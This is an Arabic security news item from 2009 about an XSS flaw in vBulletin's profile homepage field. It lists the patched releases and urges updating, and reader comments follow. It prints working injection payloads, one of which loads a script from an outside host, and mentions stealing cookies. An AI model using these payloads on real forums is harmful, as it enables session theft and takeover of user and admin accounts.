الصفحة الرئيسية الأخبار أخبار الثغرات ثغرة XSS في منتديات vBulletin 3.8.4
ثغرة XSS في منتديات vBulletin 3.8.4
تقييم المستخدمين: / 14
عاديممتاز 
الكاتب عبدالمهيمن الآغا   
السبت, 10 أكتوبر 2009 15:38

أطلقت شركة Jelsoft تحديثات لعدّة اصدارات من سكريبت المنتديات vBulletin وذلك لوجود ثغرة XSS اكتشفت مؤخّراً في صفحة الملف الشخصي وأصابت الاصدارات 3.8.4 , 3.7.6 و 3.6.12 حيث يستغل المهاجم خطأ في طريقة تحقق سكريبت vB من حقل "الصفحة الشخصية" بشكل صحيح مما يمكّنه من زرع كود Javascript مكان رابط الصفحة الشخصيّة.

vBulletin

 

في الملف الشخصي يستطيع الأعضاء وضع رابط للصفحة الشخصيّة, يتأكد سكريبت vBulletin من وجود www في الرابط الذي وضعه المستخدم أو عن طريق Regex يتحقق من مدخلات المستخدم (الأحرف a-z , الأرقام 1-9 بالاضافة لوجود ://).

بهذه الحالة يستطيع المهاجم وضع الكود التالي في حقل الصفحة الشخصية:

javascript://%0adocument.write('<script>alert(0)</script>')

مما يؤدي لظهور نافذة تحتوي على الرقم 0 وهذا يدل على تشغيل كود الجافاسكريبت أو يقوم المهاجم بوضع الكود التالي:

javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

لتحويل المستخدمين لموقع آخر بشكل تلقائي (من المحتمل تطوير الاستغلال السابق ليعمل على سرقة الكوكيز الخاصّة بالمستخدم أو مدير المنتدى وارسالها الى المهاجم وهذا يمكّنه من الدخول الى المنتدى باسم المستخدم أو مدير المنتدى دون الحاجة لمعرفة كلمة مرور).

شركة جيل سوفت أطلقت الاصدارات التالية لاصلاح الثغرة السابقة:

  • vBulletin 3.8.4 PL1
  • vBulletin 3.7.6 PL1
  • vBulletin 3.6.12 PL2

 

نحن ننصح الجميع بالتحديث بأسرع وقت ممكن عن طريق تحميل الرقع الأمنية من صفحة المشتركين في موقع vBulletin مع ملاحظة أنك ستحتاج الى رخصة فعّالة لتتمكّن من دخول منطقة المشتركين وتحميل الرقع الأمنيّة السابقة.

الجدير بالذكر أن استغلال هذه الثغرة انتشر بعد أن أطلقت شركة Jelsoft الاصدارات المحدثّة (مكتشف الاستغلال قارن الملفّات قبل وبعد التحديث ثم استنتج مكان وجود الثغرة).

 

لمزيد من المعلومات: InterN0T - vBulletin Community Forum

التعليقات (5)Add Comment
البرنس
...
أرسلت بواسطة: البرنس في October 11, 2009
كالمعتاد قالو بان ثغرات الفي بي انتهت خلاص ويمكن ثغرات الانكلود ؟؟؟ انحسرت
والاختراقات القادمه بغير طرق؟؟ تعددت الثغرات والاختراق واحد؟؟
هذا يدل على انو الحماية والاختراق سويان؟؟ لو كان محمي اليوم غدا اكيد لا والعكس صحيح
شكرا اخي عبد المهيمن واكيد راح يتم سرقه الكوكيز ؟؟ اذا ما تم ترقيع الثغره
Knight
شكرا
أرسلت بواسطة: Knight في October 11, 2009
شكرا ليكى اخى عبد المهيمن على الاهتمام بالترقيعات والتحديثات الامنية مشكور جدااااا
Mustafa Albazy
...
أرسلت بواسطة: Mustafa Albazy في October 12, 2009
تعرف مالمشكلة ياعبدو .. لو اطلعت على الكود البرمجي
سوف تجد سوء ترتيب في الكود .. وهذه الشيء هو الي يسبب وجود الاخطاء والثغرات

وايضاً اصبح الان الاصدار vBulletin 3.8.4 PL1 يحتوي على كم هائل جداً من الاكواد البرمجية .. مرة قريت مقالة يقولون وصلت للمليون سطر !!

شكراً لك على المقالة ..
تحياتي
M5aWi
يارب استر
أرسلت بواسطة: M5aWi في October 24, 2009
مشكله هالسكريبه مشهور عربياً وفيه ثغرات Xss صراااحه يارب استر
Skull-HAck3r
...
أرسلت بواسطة: Skull-HAck3r في January 12, 2010
تمة الترقية
يجب تحميل أحدث نسخة من موقع vbulletin
[removed]//
[removed]('')

لازم تكون كدة
[removed]//
[removed]('')

كان تنقل الخبر من موقع رئيسي

http://www.vbulletin.com/forum/showthread.php?319572-vBulletin-3-8-4-PL1-3-7-6-PL1-and-3-6-12-PL2-Released

_*


أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول.

busy
 

SecurityTargets